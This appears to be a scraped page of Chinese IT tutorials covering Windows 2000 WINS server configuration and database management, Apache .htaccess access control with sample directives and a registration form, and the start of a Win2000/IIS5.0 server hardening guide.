    从上图用户可以看到在添加的服务器中包含两个组件：活动注册、复制伙伴

    利用"显示统计信息"查看服务器的状态
    步骤：单击服务器，单击"操作"菜单选择"显示服务器统计信息"
    用户就可以看到有关当前服务器的详细统计报表 如图 12.5除信息直接单击报表下的"清除"按钮，如果要刷新报表则直接单击"刷新"按钮

12.5 配置 WINS 服务器
    利用服务器的属性对服务器进行设置，在服务器列表中选择服务器，然后在操作中单击属性，之后出现服务器的属性对话框
    如图 12.6

12.5.1 名称记录的设置与检查
    对于WINS 数据库中的动态记录都需要进行周期性的更新，以便验证记录的有效性，清除无效的记录，用户可以通过以下规则的设置对记录的更新和检查进行管理。
    更新间隔：用来设置WINS客户机必须重新向WINS服务器更新其注册名称的时间间隔，如果在该时间间隔内客户机未更新它的注册名称则此名称被标记为"释放"，一般客户机在时间间隔过半时向服务器提出更新请求。如果客户机经常向服务器更新注册，会增加网络流量，所有"更新间隔"不要设的过短。

默认 5 小时（indows NT Server 3.5）
4 天/6 小时（indows NT Server 3.51）
6 天/4小时(Windows 2000 Server 和Windows NT Server 4.0)
最大 999小时（indows NT Server 3.5, 3.51, and 4.0 ）
365 天(Windows 2000 Server)
最小 40 分钟(Windows 2000 Server、早期版本的Windows NT Server)

注意：的任何改变都会直接影响到"废止间隔"、"废止超时"的设置。如图12.7

废止间隔：一个被设置为"释放"的计算机名称在经过"废止间隔"后被标记为"废弃不用"。

默认 依赖于"更新间隔"的设置
最大 999小时（indows NT Server 3.5, 3.51, and 4.0 ）
365 天(Windows 2000 Server)
最小 40 分钟(Windows 2000 Server、早期版本的Windows NT Server)
1小时（Windows NT4.0）

废止超时：一个已被标记为"废弃不用"的计算机名称，在经过"废止超时"后，将被从服务器的数据库中删除。

默认 依赖于"更新间隔"的设置
最大 999小时（indows NT Server 3.5, 3.51, and 4.0 ）
365 天(Windows 2000 Server)
最小 24 小时(Windows 2000 Server、早期版本的Windows NT Server)

    验证间隔：经过此间隔后，WINS服务器必须验证那些不属于此服务器的名称是否仍然活动。

默认 依赖于"更新间隔"的设置
最大 999小时（indows NT Server 3.5, 3.51, and 4.0 ）
365 天(Windows 2000 Server)
最小 24天（所有版本)

周期性数据库一致性检查：用来检查本地服务器的数据库与其它 WINS 服务器的数据库的一致性，由于启动一致性检查会影响服务器的性能，所以在默认情况下，它被设为不启动。如果启动了一致性检查，在默认情况下，每天将检查至多 30000 个纪录，检查从 2:00AM 开始，在每次检查时，将检查本地数据库中的纪录与其它服务器中属于此所有者的数据库中的相应纪录是否一致。

每阶段纪录检查的最多次数：在一致性检查时所能检查的最大纪录数

检查：设置是检查同一所有者还是检查任选一个合作伙伴在其它 WINS 服务器中的数据库的纪录的一致性。

间隔：设置每次检查之间的时间间隔，默认为 24 小时。

起始：检查的启动时间,默认为 2：00AM。

12.5.2 事件的记录与处理
    WINS 服务对于事件的记录为用户及时查找和更正错误提供了准确的依据，同时 Windows 2000 Server 的 WINS 服务新增了突发事件的处理功能，为 Windows 2000 Server 在大型企业中应用的稳定性提供了可靠的保证。如图 12.8
    WINS 记录：指定是否将数据库中的变化记录到 %Systemroot%\System32\wins\jet.log 中,以便在 WINS 服务器出现故障时查看。
    将详细事件记录到日志中：设置是否以详细的方式记录事件，由于这种方式占用过多的系统资源，会影响服务器的性能，所以不推荐使用这种方式。
    启动突发处理：现在 WINS 服务器支持处理大量的突发性的 WINS 服务器负荷。当大量的 WINS 客户机开机同时向 WINS 服务器支持名称时就会产生突发性负荷，如一个新的WINS服务器启动、大量的客户机第一次登录到网络，会造成网络上的 WINS 通信增大。

突发处理模式使用突发队列规模（burst-queue size）作为其启动值，默认为 500。这个值指定了在该值范围内客户机的名称注册请求及名称更新请求均为正常情况。当客户机的正常或更新请求数大于这个值的时候，突发处理启动，服务器对于那些超过启动值的客户机请求立即发送一个肯定回答，在肯定回答中利用 TTL 的值的不同从而控制客户机请求所产生的负荷。
    假设服务器的突发队列规模设置为 500，这时客户机的请求数大于 500，则服务器立刻对多出的 100 个请求（500-600）发送肯定回答并将TTL设置为 5 分钟，对于 600-700 之间的客户机请求设置一个更大的 TTL 值，依此类推，TTL 最大值为 50 分钟。服务器的突发队列规模最大为 25000，当请求数大于这个数值时服务器将多出的请求清除。
    在设置突发处理有四种选择：
低：突发队列规模设置为 300
中：突发队列规模设置为 500
高：突发队列规模设置为 1000
自定义：突发队列规模设置最大为 25000
    数据库路径：指定数据库存放的路径
    起始版本计数：用十六进制数设置 WINS 服务器数据库的起始版本 ID 值，最大值为 231-1（7FFFFFFF）。当此服务器的复制伙伴从此服务器复制数据库时，如果发现此版本号比现有的数据库版本号低，则不需要复制。

      12.6 数据库的复制
    为了避免在网络中单台WINS服务器发生故障时导致无法提供服务的危险，在网络中最好设置两台（或以上）WINS 服务器(主 WINS 服务器、辅助 WINS 服务器)，这两台服务器的数据库互为备份，也就是相互复制数据库，以保持两台服务器上的数据库中的数据是相同的，提高了可靠性和容错性。WINS 数据库的复制采用的是一种增量型的复制，即在复制过程中只复制数据库中变化的记录，并不是复制整个数据库。
    在进行数据库复制之前，首先用户要设置 WINS 服务器之间的关系，从而确定那些服务器之间可以进行数据库复制，也就是设置 WINS 服务器的"复制伙伴"。一个WINS服务器可以有以下两种复制伙伴：
接收伙伴（Pull Partner）：
    接收伙伴是一台 WINS 服务器，它接收由其发送伙伴所发送来的在一定时间间隔内数据库的更新数据。这是通过接收伙伴要求复制的数据的版本 ID 比现有的数据的版本ID更高来实现的。可以通过以下三种方式通知发送伙伴将数据复制过来：
§　当 WINS 服务器启动的时候
§　达到管理员设定的复制时间（Replication interval）
§　由管理员执行立即复制的操作

发送伙伴（Push Partner）：
    它会将其数据库中喜爱一定时间间隔内变化的时间发送给其接收伙伴。可以通过以下四种方式将时间发送给接收伙伴：
§　当WINS服务器启动的时候
§　数据库中IP地址与名称映射中的IP地址发生改变的时候
§　当数据库中的记录变化数达到所设置的更新计数（Update count）值的时候
§　由管理员执行立即复制的操作
设置复制伙伴的步骤如下：

    步骤1 启动"WINS控制台，选择一个WINS服务器，然后选择其中的复制伙伴组件
    步骤2单击"操作"菜单选择"新建"选择复制伙伴会出现如图12.9所示的"新的复制伙伴"对话框中填写该WINS服务器的服务器名称或IP地址→确定

步骤3 这时在复制伙伴组件中添加了一个 WINS 服务器，用户可以对所有的复制伙伴统一设置属性，也可以分别对每一个复制伙伴设置属性，下面以对单个复制伙伴设置属性为例来说明如何设置
    步骤4 在控制台右侧窗体中选择服务器单击"操作"菜单选择"属性"
    步骤5 选择"高级"标签 如图 12.10
    步骤6 在默认情况下，复制伙伴既是接收伙伴（Pull Partner）又是发送伙伴（Push Partner），如果要将它设置为接收伙伴则在复制伙伴及类型中选择"拉"，并在"拉"参数下设置开始时间：每天开始进行复制的时间，复制间隔：每隔多长时间复制一次。输入完成后单击"确定"按钮。
    步骤7 如果要将其设置为发送伙伴则在复制伙伴及类型中选择"推"，并在"推"参数下设置更新计数：只有当数据库中的改变记录数达到此计数值的时候才可以开始数据库复制。输入完成后单击"确定"按钮。

    由于复制伙伴是相对的，所以如果用户将 WINS 服务器 A 设为服务器B的发送伙伴，那么用户必须将服务器B设置为服务器 A 的接收伙伴。

立即复制数据库：
    如果用户不想等到发送伙伴达到更新计数或接收伙伴到达复制间隔时才进行复制动作，用户还可以采用发送复制触发器(Replication Trigger)或立即复制(Replicate now)的方式
    如果要给接收伙伴发送复制触发信号：
步骤1 从 WINS 服务器中的复制伙伴组件中选择相应的接收伙伴。

步骤2 选择操作菜单中的所有任务→单击"发送"推"复制触发器"如果用户在发送触发信号时，希望接收触发信号的接收伙伴在接受到从发送伙伴传来的数据后，向其所有的接收伙伴发送一个复制触发信号，则用户可以在确认对话框中选择"传播"推"复制触发器" 如图 12.11，也就是进行连续复制。

    如果要给发送伙伴发送复制触发信号：
步骤1 从WINS服务器中的复制伙伴组件中选择相应的发送伙伴。
步骤2 选择操作菜单中的所有任务→单击"发送"拉"复制触发器"→在确认对话框重单击确定
    如果用户需要立即对所有的复制伙伴开始复制数据
步骤1 从WINS服务器中的选择复制伙伴组件
步骤2 选择操作菜单中的所有任务→单击"立即复制"
    用户还可以利用复制伙伴的属性对服务器所以的复制伙伴进行设置，如图 12.12下面让用户来看一下其中一些新增的功能：

    在复制伙伴的常规标签中：
"仅用伙伴复制"：如选中则复制操作只能在伙伴之间进行，如未选中则可以将数据发送给一台不在或列表中的 WINS 服务器
"移植"：指定在数据库中的唯一或多宿主静态映射记录是否可以被新注册的或复制来的更新名称所覆盖，选中表示可以覆盖，未选中表示不可以。
    "推、拉"参数"用于设置发送和接收的起始设置，其中计数阈值表示的就是前面在发送参数中的计数值。
    如图 12.13，在复制伙伴的高级标签中：
保持连接方式：在以前版本的 WINS 服务器之间在复制操作完成后连接断开，在下一次复制操作时它们又需要重新连接，这样会造成复制操作的延迟，从而造成数据的不一致，为了避免上述问题的发生，可以利用这一选项，持续的保持复制伙伴之间的连接，便于复制操作的进行。

阻塞服务器拥有的记录：当将一台 WINS 服务器从网络上移走的时候，这台服务器数据库中的记录仍然分布在其它复制伙伴服务器中。在某些情况下 WINS 并不将这些记录删除，或在默认情况下它们将被保存一段时间。造成这种情况的原因包括：
§　由被移走的 WINS 服务器所创建的静态映射随机的复制到其它 WINS 服务器上，除非管理员手工将它们删除。
§　在被移走的 WINS 服务器上动态映射不会立刻从数据库中清除。
    在 Windows 2000 Server 中,利用"阻塞服务器拥有的记录"这一功能阻止被移走的 WINS 服务器上的记录继续被复制。用户可以指定被移走的服务器的 IP 地址，从而在一定时间内把它的记录从其它活动的 WINS 数据库中删除掉。这项功能对从网络上移去 WINS 服务器非常有用。
    启动自动伙伴配置：设置 WINS 服务器将在网络上发现的其它 WINS 服务器设置为自己的复制伙伴。由于 WINS 服务器在加入到网络后会利用多点传输方式定期向网络发送通告，声明自己，所以用户可以使用自动伙伴配置功能。它通过以下步骤实现：
§　将发现的 WINS 服务器的 IP 地址添加到复制伙伴中
§　将该服务器设置为接收伙伴和发送伙伴
§　将"拉"参数中的时间间隔设置为 2 小时

12.7 静态映射（Static Mapping）的管理
    当 WIND 客户机开机的时候，客户机会将其 IP 地址和计算机名注册到 WINS 服务器的数据库中，并定期的更新名称注册，所以在 WINS 服务器的数据库中客户机的计算机名称和 IP 地址的映射是动态的。
    用户也可以利用静态映射的方式，在数据库中手工创建计算机名称与 IP 地址的映射关系，这种映射关系是没有时间限制的，它可以长期保存在数据库中，除非管理员手工的将其删除。
    但静态映射只能用于不具有 WINS 功能的客户机，以便其它的 WINS 客户机能与其通信。对于 NON-WINS 客户机要通过 WONS Proxy 与查询其它 WINS 客户机的 IP 地址。另外，当 DHCP 和 WINS 服务器同时存在的时候，DHCP 保留的 IP 地址设置要优先于 WINS 的静态映射的设置。
    添加静态映射的步骤：
    步骤1 　启动 WINS 控制台在其中选择相应的服务器，选择活动注册组件
    步骤2　单击"操作"菜单选择"新建"然后选择"静态映射"

  步骤3　在设置静态映射对话框中(如图12.14),输入计算机名称、其所在的域的域名
    步骤4　从"类型"中选择一个适当的映射类型：
§　唯一（Unique）
    计算机名与 IP地址是一一对应的关系

§　组（group）
    一般的组，在 WINS 服务器上组中成员的具体 IP 地址，当客户机向服务器查询此组时， WINS 服务器将答复一个广播地址即 255.255.255.255，则客户机利用这一地址进行广播
§　域名(Domain name)
    为使用 WindowsNT4.0 的域创建静态映射的域名 domain_name [1c],它最多可以保存 25 个成员的 IP 地址（包括主域控制器及备份域控制器）
§　Internet 组(Internet Group)
    用户自定义的组，利用它将网络上的资源组成一个组，以便查找网上资源，组中最多可以包含 25 个成员，组的名称表示为： group_name [20]
§　多宿主（multihomed）
    同一个计算机名与多个 IP 地址进行映射，最多为 25 个 IP 地址，这种情况发生在一台计算机有多个网卡，一块网卡有一个或多个 IP 地址，但计算机名称相同。
    步骤5　输入 IP 地址
    步骤6　单击"确定"按钮

      12.8 WINS 数据库的管理
    WINS数据库文件位于 ％Systenroot%\System32\Wins 目录中，如图12.15

下表列出了 WINS 数据库相关的文件：

文件 描述

J50.log 和 J50#####.log

记录WINS 数据库所有事务的文件，可以利用它恢复数据库的数据。

J50.chk

审核点文件，指明最后一次把事务记录成功的写入到数据库中的位置。每当在数据库(Wins.mdb)中写入数据时此文件将被更新。

Wins.mdb

WINS 数据库文件，它包括两张表： IP 地址与所有者 ID的映射表、注册名称与 IP地址的映射表。

Winstmp.mdb

WINS 服务器在运行时所使用的临时交换文件。

Res#.log

保留的记录文件。

    注意：不要移动或删除 J50.log, J50#####.log, Wins.mdb, Winstmp.mdb, Res#.log 这些文件。

12.8.1 备份数据库：
    WINS 管理器提供了 WINS 数据库的备份功能，在用户指定了备份数据的路径后，默认情况下管理器每 3 小时对数据库进行一次完整的备份。
    具体步骤如下：
    步骤1　首先选择服务器单击"操作"菜单选择"属性"，在服务器属性的常规标签中设置备份数据库的路径 如图 12.6　所示，单击"确定"
    步骤2　选择需要备份的 WINS 服务器单击"操作"菜单选择"所有任务"选择"备份 WINS 数据库"，在确认对话框中单击"是"按钮，在备份结束后单击确定
    注意：不要将备份路径设置到网络驱动器上，在备份完成后会在用户指定的路径中创建一个新目录 \Wins_bak\。

12.8.2 恢复数据库：
    步骤1　停止 WINS 服务
    步骤2　删除 %SystemRoot%\System32\Wins 目录中的所有文件
    步骤3　自 WINS 控制台中新选择需要恢复的服务器
    步骤4　单击"操作"菜单选择"所有任务"选择"恢复 WINS 数据库，在浏览文件夹对话框中选择备份数据库的路径→确定
    注意： 只有在 WINS 服务停止时，才可以在"所有任务"中看到"恢复 WINS 数据库"选项，

    12.8.3 清除（Scavenge）数据库
    数据库的清除就是将更新后仍然存在于数据库中的过时信息清除掉。
    本地服务器的数据库中时常保留一些已经被释放的记录和从其它服务器复制过来的过时的记录。自动清理的时间间隔由用户设定的更新间隔和废弃间隔决定，当然用户也可以手工清理数据库。
    下表将对比清除前后数据库记录的变化情况：

清理前记录的状态
清理后记录的状态
    属于此 WINS 服务器的计算机名称，目前处于活动状态，但更新间隔（Renew Interval）时间已过 标记为释放（Released）.
    属于此 WINS 服务器的计算机名称，目前处于释放状态，但废弃间隔（Extinction Interval）时间已过 标记为废弃（Tombstoned.）
    属于此 WINS 服务器的计算机名称，目前处于废弃状态，但废弃超时间隔（Extinction timeou）时间已过 从数据库中删除
    属于其它 WINS 服务器的计算机名称，目前处于废弃状态，但废弃超时间隔（Extinction timeou）时间已过 从数据库中删除
    属于其它 WINS 服务器的计算机名称，目前处于活动状态，但确认间隔（Renew Interval）时间已过 重新生效.
    从其它数据库复制来的废弃的或已被删除的名称 从数据库中删除
手工清除数据库的方法：选择服务器→操作→所有任务→清除 WINS 数据库

12.8.4 数据库的一致性检查
    通过数据库的一致性检查可以帮助用户维护大型网络中的 WINS 数据库的完整性。当一致性检查启动的时候，服务器会接收其数据库中包含的每个人所有者服务器中的记录，包括那些虽然不是复制伙伴但保存着本地记录的服务器。
    所有接收来的记录将与本地的记录进行对比，利用以下方式检查数据库的一致性：
§　如果本地记录与接收来的记录一致则更新它的时间戳（timestamp）
§　如果本地记录的版本 ID 比接收来的记录的版本 ID 低，则将接收的记录加入数据库并将本地记录标记为已删除。
§　如果接收来的记录与本地记录版本 ID 相同但名称不同，则用接收来的记录覆盖本地记录。
    自动检查数据库一致性的设置 如图 12.7
    手工检查数据库的一致性：选择服务器单击"操作"菜单选择"所有任务"选择"检查 WINS 数据库一致性"

    12.8.5 显示 WINS 数据库的记录
    显示所有记录：在 WINS 控制台中选择服务器然后选择"活动注册" 单击"操作"菜单选择"查看数据库"选择"显示所有记录" 如图12.16

      设置过滤器：在 WINS 控制台中选择服务器，选择"活动注册" 单击"操作"菜单选择选择"查看数据库"，选择记录类型标签 如图 12.17，然后在记录类型标签中选择要显示的记录类型单击"确定"。

    12.9 将 WINS 移植到 DNS
    对于纯 Windows 2000 环境，用户可以考虑在网络中不使用 WINS 服务器，即让 WINS 服务器退役（decommissioning），在用户决定让用户的服务器退役之前用户需要考虑以下问题：
§　在用户的网络中是否仍有计算机使用早期版本的Windows 或 Windows NT?
§　在用户的网络中是否仍有使用早期版本的Windows或 MS-DOS操作系统的计算机需要使用NetBIOS 名称服务？
    如果其中有一个答案为是则用户仍然需要使用 WINS 服务，如果两个答案均为否，那么用户可以让 WINS 服务退役。
    通过以下步骤完成从 WINS 服务迁移到 DNS:
    步骤1 重新设置客户机不使用WINS服务
§　对于利用手工设置使用TCP/IP的用户, 将TCP/IP属性中的主WINS 服务器和第二WINS 服务器中的 IP 地址清除。
§　对于利用 DHCP服务进行TCP/IP 设置的客户机，设置 DHCP服务器不提供 WINS 服务的相应设置。

    步骤2 在重新设置客户机的时候，检查是否为客户机设置了 DNS 服务。
§　对于利用手工设置使用 TCP/IP 的用户, 设置TCP/IP属性中的主 DNS 服务器和第二 DNS 服务器中的 IP 地址。
§　对于利用 DHCP 服务进行 TCP/IP 设置的客户机，设置 DHCP 服务器提供DNS服务的相应设置。
    步骤3 开始让单独的 WINS 服务器执行退役任务
    在将客户机设置为使用 DNS 服务并停用 WINS 服务后，可以开始让单独的 WINS 服务器退役。WINS 管理器将以本地服务器为所有者的记录全部标记为"释放"。记录的这种"废弃"状态将被复制给其它 WINS 服务器，当这些记录在其它服务器上保存时间超过废弃超时的时间间隔后，其它服务器将从数据库中清除这些记录。
    步骤4 通过相应的选择设置降低并重定向 WINS 的通信量。
    在 Windows 2000 网络环境中,有时仍相应继续使用 WINS 服务。用户可以利用发附加的设置选项限制网络中的 WINS 服务器及降低 WINS 的通信量。在 DNS 服务器中设置使用 WINS 进行域名解析。

12.10.7 设置 WINS Proxy
    在 Microsoft 网络中，只有 WINS-enabled 客户机可以直接与 WINS 服务器通信，即有 WINS 服务器解析计算机名称和 IP地址的映射关系。对于NON-WINS客户机虽然可以利用广播方式获得客户机的 IP 地址，但广播无法跨越网段，这时用户跨越利用 WINS Proxy 解决这一问题。
    默认情况下，WINS Proxy 监听网络上NON-WINS客户机的广播，当其收到广播后，它就会转向WINS服务器查询，并将由WINS服务器传来的 IP 地址再传给客户机。同时 WINS Proxy 将由 WINS 服务器传来的 IP 地址保留一份在它的内存中（Cache）,默认情况下只会保存 6 分钟。当下一次再有客户机查询相同数据时，它直接利用内存中的数据响应。
    设置 WINS Proxy的具体步骤：
    在 WindowsNT4.0中设置WINS Proxy
    将 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Netbt\Parameters中的
    Registry参数EnableProxy设置为 1。

      12.10. 启用客户机的 WINS 功能
    在 WINS 服务器安装设置完后，用户只要将客户机设置为 WINS －enabled 就可以启用客户机的功能了。下面具体说明如何设置各种客户机：
    12.10.1. DOS 的 WINS 设置
    修改 PROTOCOL.ini 文件，假设用户的网络中有两台 WINS 服务器，使用以下方法将它们加入到[TCPIP]Session 中：
    WINS_SERVER0=198 188 188 1
    WINS_SERVER1=198 188 188 2
    12.10.2. LAN Manager 的 WINS 设置
    修改 PROTOCOL.ini 文件，假设用户的网络中有两台 WINS 服务器，使用以下方法将它们加入到 [TCPIP_XIF] Session 中：
    WINS_SERVER0=198 188 188 1
    WINS_SERVER1=198 188 188 2

      12.10.3 Windows98 的 WINS 设置
    在"控制面板"选择"网络" "TCP/IP" "属性"在 " WINS 配置"选项卡中单击"启动 WINS 解析"，然后添加服务器的 IP地址单击"确定" 如图 12.18。
    如果使用 DHCP 服务进行自动设置则选择"使用 DHCP 进行 WINS 解析"

  12.10.4 Windows 2000 Professional 的 WINS 设置
    在"控制面板"中双击"网络和拨号连接"，在出现的"本地连接"中弹击"属性" 然后单击 "Internet 协议（TCP/IP）"单击"属性"，在"高级"选项卡中选择 "WINS" ,然后添加 WINS 地址并选择"启用 TCP/IP 上的 NetBIOS"，单击"确定"
    如果利用 DHCP 服务进行自动设置则选"使用来自 DHCP 服务器的 NetBIOS 设置，如图 12.19。

12.10.5 WindowsNT4.0 的 WINS 设置
    开始→设置→控制面板→网络→协议→ TCP/Ip 通信协议→属性→ WINS 地址，然后输入主 WINS 服务器及二级 WINS 服务器的 IP 地址→ 确定 如图 12.20。

12.10.6 利用 DHCP 自动设置客户机的 WINS 功能
    当客户机启动 DHCP 功能时，用户可以利用 DHCP 服务器自动设置客户机的 WINS 功能：
    在 WindowsNT4.0 服务器上设置由 DHCP 服务器自动设置并启动客户机的 WINS 功能，具体步骤如下：
    步骤1 启动 DHCP 管理器然后选择一个 IP 范围
    步骤2 在 DHCP 选项中选择作用域
    步骤3 在 DHCP 选项领域对话框中添加 044WINS/NBNS 服务器和 046 WINS/NBT 节点类型选项，并在在编辑数组中分别输入 WINS 服务器的 IP 地址和节点类型 "0X8 h-node"如图 12.21

    在 Windows2000 服务器上设置 DHCP 选项，用户已在第三章第二节中作了详细的说明，在此就不重复了。
    在以上设置完成后，用户可以通过路由器 PING 另一个网段中的客户机的计算机名，看该客户机能否正确响应，如果可以正常响应表示设置正确。

12.10.7 设置WINS Proxy
    在 Microsoft 网络中，只有 WINS-enabled 客户机可以直接与 WINS 服务器通信，即有 WINS 服务器解析计算机名称和 IP 地址的映射关系。对于 NON-WINS客户机虽然可以利用广播方式获得客户机的 IP 地址，但广播无法跨越网段，这时用户跨越利用 WINS Proxy 解决这一问题。
    默认情况下，WINS Proxy 监听网络上 NON-WINS 客户机的广播，当其收到广播后，它就会转向 WINS 服务器查询，并将由 WINS 服务器传来的 IP 地址再传给客户机。同时 WINS Proxy 将由 WINS 服务器传来的 IP 地址保留一份在它的内存中（Cache）,默认情况下只会保存 6 分钟。当下一次再有客户机查询相同数据时，它直接利用内存中的数据响应。
    设置 WINS Proxy 的具体步骤：
    在 WindowsNT4.0 中设置 WINS Proxy
    将 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Netbt\Parameters 中的
    Registry 参数 EnableProxy 设置为 1。

返回


WWW访问控制及客户帐号管理

《一键清理系统垃圾》

WWW访问控制及客户帐号管理

互联网上网站建立以后，一个普遍的需求是能够方便地管理上站用户的账号信息，以及某些页面针对限定用户开放。比较好的一个解决方案是采用.htaccess协议，但网上关于此协议的文档很多并没有讲清楚，包括一些示例也存在歧义，初学者很容易迷惑。

一、 为什么选择

.htaccess解决方案

众所周知，html的一个缺点是本身无法保持状态，客户连接服务器获取一个页面后，对服务器而言，此连接就已不存在了，下一页将重新连接。如何跟踪用户，目前常用的有以下解决方案：

1在html的表单中利用隐藏输入域来传递信息，如：

〈INPUT TYPE=hidden NAME="username" VALUE="foresee"〉

VALUE值即为状态信息，所以每次不同，不可能事先写好，只能通过CGI程序生成HTML页面：

Print 〈input type=hidden name=\"origname\" value=\"＄username\"〉"

这样，在下次表单重新提交时可以包含进去。

使用隐藏输入确实是保持状态的一种简单办法，但必须由CGI程序生成页面，如大量使用，速度慢、不易于维护。

2向客户端发送cookie

cookie是一种通过客户端的浏览器本身维持状态（甚至不同会话间）的方法。在浏览器访问站点时，调用set－cookie在客户端建立cookie，它将在以后每次连接到站点时返回给Web服务器，从而携带用户ID。但cookie技术在使用中有以下缺陷，这甚至是致命的缺陷：

1) cookie由于涉及到用户隐私的争论，所以缺乏广泛的支持，首先，不是所有的浏览器都支持cookie，另外，像IE这样的浏览器出于安全性的考虑，还可以设置屏蔽掉cookie。所以，使用cookie ，至少要为客户提供其他选择。

2) cookie缺乏安全保证，如果你的机器被别人使用访问Web服务器，浏览器也会同样发送cookie。

3会话ID

会话ID是每个客户在到达Web站点时分配的惟一标识，多经由URL自身传递。在有些站点我们可能见到很长、看起来很奇怪的URL，常常是一串数字或字母。也正由于这种方案将URL弄得长且怪，笔者不倾向采用此方案，所以也不是本文的主旨。

4建立服务器端客户文件

这种方案是在服务器端维护一个注册后的在线客户表，利用IP地址等信息来保持客户状态。但这种方案不能独立地解决我们的需求。很简单，如果几个客户使用同一个代理服务器（proxy）来访问Web Server，那么，在此方案下他们将被视为同一个用户。

5.htaccess协议

.htaccess实际是系统访问控制文件(ACF)族中的一个。该协议目前为大多数UNIX环境的服务器支持，例如，普遍采用的Apache服务器较为通用（值得一提的是，与此相关的另一个文件为access.conf，还可实现基于主机域名/地址的访问控制）。其优点为：

● 控制取决于服务器（当然目前NT除外），客户端具有很好的兼容性；

● 针对目录保护，可方便灵活地定制；

● 弹出窗口式密码校验简单明了，符合惯例；

● 客户注册后，CGI环境变量“REMOTE—USER”即为校验后的客户账号，在整个保护区访问无需再注册，有效地保持了状态。

二、 .htaccess协议

实施步骤及要点

.htaccess的具体实施步骤如下：

1规划目录，将要控制访问的所有文件集中至选定的目录里。

2在要存取控制目录下建立一个文件，文件名为“.htaccess”，别忘了有一个“.”（以“.”开始的文件名在UNIX下表示是隐含文件）。文件内容网上的很多地方都没有讲清楚，包括一些ISP提供的示例，也模糊不清。一个经验证的样本如下：

AuthUserFile /path/.htpasswd

AuthGroupFile /dev/null

AuthName Information

AuthType Basic

〈Limit GET POST PUT〉

require valid－user

〈/Limit〉

黑体字需根据实际情况替换。其中：

AuthName: 用户认证名，将会在密码检测框中出现，但注意应为一个单词，否则要用引号括起来；

AuthType: 使用的认证方式, 缺省为: Basic；

AuthUserFile: 认证用户口令文件绝对路径，请根据实际情况替换/path/；

AuthGroupFile: 认证用户组别文件绝对路径；

〈Limit GET〉〈/Limit〉: 标识访问特定目录访问控制段的开始/结束；

require entity1 entity2: 要求认证的内容，entity1可以是user、group; entity2 为认证用户或组名。这一项最需要特殊说明，它可导致几种不同的配置，这正是往往没被说清之处：

1) 不配置用户组时, 第二行的用户组别文件可设为：AuthGroupFile /dev/null。要求认证的内容则为：require valid－user。这时，管理用户只需配置 .htpasswd文件；也可做限定，如 ： require user admin guest foresee。这样，只有指定的用户才能登入。

2) 如需配置用户组，首先指定组文件如下：AuthGroupFile /path/.htgroup。

要求认证的内容则应为：require group users，而.htgroup文件的一个示例为：

users: admin guest foresee

以上两种搭配是不能混用的，像下面的.htaccess，你是无论如何注册不进去的：

AuthUserFile /path/.htpasswd

AuthGroupFile /dev/null

AuthName Information

AuthType Basic

〈Limit GET POST PUT〉

require group valid－user

〈/Limit〉

3口令文件.htpasswd示例如下：

shallwe:?W5h9v9KOwKI

foresee:vZTYLaCW8lI

try:?LuRyE3jcujI

大家一看就知道，它是按照DES算法加密过的。每条记录由账号和密码组成。在通过下文提供的程序管理前，你可使用Web服务器通常提供的htpasswd程序，当然，这需要一个主机的shell账号，在UNIX命令行状态下，.htaccess文件指定的path中执行以下命令：

＃ /var/www/bin/htpasswd －c .htpasswd username

“－c”参数仅在第一次使用，它指明创建.htpasswd文件。username表示要增加的用户名，输入此命令后，系统会提示你输入密码两遍，这个用户就生效了。如果这个用户存在则提示你修改密码。

三、 通过编程实现账号

自动管理

htpasswd命令必须手工完成，不可能用于管理大量用户的增删。我们当然想到最好能通过WWW页面在线添加、删除，以下提供一个样例：

一个简单的录入表单如下：

〈html〉

〈head〉

〈meta http－equiv="Content－Type" content="text/html; charset=gb2312"〉

〈title〉欢迎加入〈/title〉

〈/head〉

〈body BGCOLOR="＃FFFF99" TEXT="＃000000" LINK="＃0000FF" ALINK="＃FF0000" VLINK="＃FF00FF"〉

〈br〉

〈h1〉〈center〉欢迎加入〈/center〉〈/h1〉

〈hr〉

〈form method="POST" action="/cgi－bin/regist.cgi"〉

〈FONT FACE="楷体—GB2312" SIZE="＋1"〉〈B〉

〈p〉账号：〈input type="text" name="username" size="20"〉〈/p〉

〈p〉密码：〈INPUT TYPE="password" NAME="password" size="10" 〉〈/p〉

〈hr〉

〈p〉〈input type="submit" value="注册" name="B1"〉

〈input type="reset" value="重填" name="B2"〉〈/p〉

〈/B〉〈/FONT〉

〈/form〉

〈/body〉

〈/html〉

此外，还需再用perl语言编写一个小程序，处理以上form，实现新用户的添加、删除，因为.htpasswd文件有固定的格式，客户的其他信息可另外生成文件来保存和管理。

返回


安全正确的配置Win2000+IIS5.0服务器

《一键清理系统垃圾》

安全正确的配置Win2000+IIS5.0服务器

安全配置Win2000服务器

目前，WIN2000 SERVER是比较流行的服务器操作系统之一，但是要想安全的配置微软的这个操作系统，却不是一件容易的事。本文试图对win2000 SERVER的安全配置进行初步的探讨。

一、 定制自己的WIN2000 SERVER:

1．版本的选择：WIN2000有各种语言的版本，对于我们来说，可以选择英文版或简体中文版，我强烈建议：在语言不成为障碍的情况下，请一定使用英文版。要知道，微软的产品是以Bug & Patch而著称的，中文版的Bug远远多于英文版，而补丁一般还会迟至少半个月（也就是说一般微软公布了漏洞后你的机子还会有半个月处于无保护状况）
2．组件的定制：win2000在默认情况下会安装一些常用的组件，但是正是这个默认安装是极度危险的（米特尼科说过，他可以进入任何一台默认安装的服务器，我虽然不敢这么说，不过如果你的主机是WIN2000 SERVER的默认安装，我可以告诉你，你死定了）你应该确切的知道你需要哪些服务，而且仅仅安装你确实需要的服务，根据安全原则，最少的服务+最小的权限=最大的安全。典型的WEB服务器需要的最小组件选择是：只安装IIS的Com Files，IIS Snap-In，WWW Server组件。如果你确实需要安装其他组件，请慎重，特别是：Indexing Service, FrontPage 2000 Server Extensions, Internet Service Manager (HTML)这几个危险服务。
3．管理应用程序的选择： 选择一个好的远程管理软件是非常重要的事，这不仅仅是安全方面的要求，也是应用方面的需。Win2000的Terminal Service是基于RDP（远程桌面协议）的远程控制软件，他的速度快，操作方便，比较适合用来进行常规操作。但是，Terminal Service也有其不足之处，由于它使用的是虚拟桌面，再加上微软编程的不严谨，当你使用Terminal Service进行安装软件或重起服务器等与真实桌面交互的操作时，往往会出现哭笑不得的现象，例如：使用Terminal Service重起微软的认证服务器（Compaq, IBM等）可能会直接关机。所以，为了安全起见，我建议你再配备一个远程控制软件作为辅助，和Terminal Service互补，象PcAnyWhere就是一个不错的选择。

二、 正确安装WIN2000 SERVER:
